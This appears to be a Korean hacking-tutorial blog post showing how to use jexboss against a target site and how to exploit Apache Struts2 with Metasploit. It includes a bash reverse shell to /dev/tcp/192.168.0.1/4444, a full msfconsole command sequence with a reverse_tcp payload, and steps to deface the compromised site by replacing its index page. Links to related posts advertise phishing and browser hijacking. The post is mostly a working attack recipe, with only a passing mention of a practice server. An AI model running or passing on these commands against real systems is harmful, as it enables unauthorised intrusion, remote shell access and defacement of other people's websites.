https://github.com/joaomatosf/jexboss.git
[jexboss]
취약점을 찾아내는 도구인 jexboss를 설치해줍니다. (git clone)
jexboss는 설치 후
> ./jexboss.py -u [해킹할 사이트 주소] 명령어를 쳐주면 취약점을 찾아내며 다른 옵션을 보려면 -h 옵션을 줍니다.
만약 취약점이 있다면 yes로 shell 세션을 획득할 수 있습니다.
우선 핸들러를 틀어줍니다.
그 후 shell 세션에서 나온 리버스 쉘 명령어를 shell에 넣어줍니다
>/bin/bash -i > /dev/tcp/192.168.0.1/4444 0>&1 2>&1
이를 통해 jexboss를 이용한 해킹이 가능합니다.
[struts2]
예전 중국 해커가 사용한 취약점입니다.
https://www.exploit-db.com/exploits/45262
익스플로잇디비에 자세한 정보가 나와있으며,
http 헤더에 있는 content-type 부분에 악성코드를 삽입하는 형태입니다.
struts2는 struts2에 취약한 모의해킹 사이트가 있어야 실습 가능합니다.
https://archive.apache.org/dist/struts/2.3.20/
설치하여 서버로 돌려줍니다.
우선 핸들러를 틀어줍니다. payload는 linux/x86/shell/reverse_tcp로 맞춰줍니다.
그 후 칼리에서 msfconsole을 틀고
>use exploit/multi/http/struts_code_exec_jakarta
>show options
>set payload linux/x86/shell/reverse_tcp
>set rhost [struts서버 아이피]
>set lhost [칼리 아이피]
>set targeturi /struts2.3.20/
>exploit
세션이 확립되면 디페이싱을 해줍니다.
디페이스는 웹페이지를 가져와서 수정한 후 강제로 업로드시키는것입니다.
>sessions -i 1
>download /root/workspace/struts2.3.20/WebContent/token/index.html /root - 토큰의 인덱스페이지를 칼리 루트폴더에 넣습니다. 그 후 해당 인덱스페이지를 수정해주고 index 이름을 index1 등 다른 이름으로 변경합니다.
>cd /root/workspace/struts2.3.20/WebContent/token/
>upload /root/index1.html . - cd를 token으로 했으므로 . 으로 현재 폴더에 넣어줍니다.
그 후 기존 인덱스 파일 명을 변경 후 index1 넣어줬던 파일 명을 index로 변경합니다.
>mv index.html index2.html
>mv index1.html index.html
'3. 웹 애플리케이션 취약점 진단' 카테고리의 다른 글
DNS 스푸핑을 활용한 피싱사이트 제작 (0) | 2023.12.27 |
---|---|
브라우저 링크에 방문한 것으로 좀비pc로 만드는법 [beEf-XSS] (0) | 2023.12.27 |
취약점 분석도구 nessus 사용법 (0) | 2023.12.27 |
무차별 대입 공격에 사용될 사전 파일을 merge 해주는 도구 [dymerge] (0) | 2023.12.26 |
URL에 접속하면 정확한 위치 추적이 되는 툴 - TrackURL (0) | 2023.12.26 |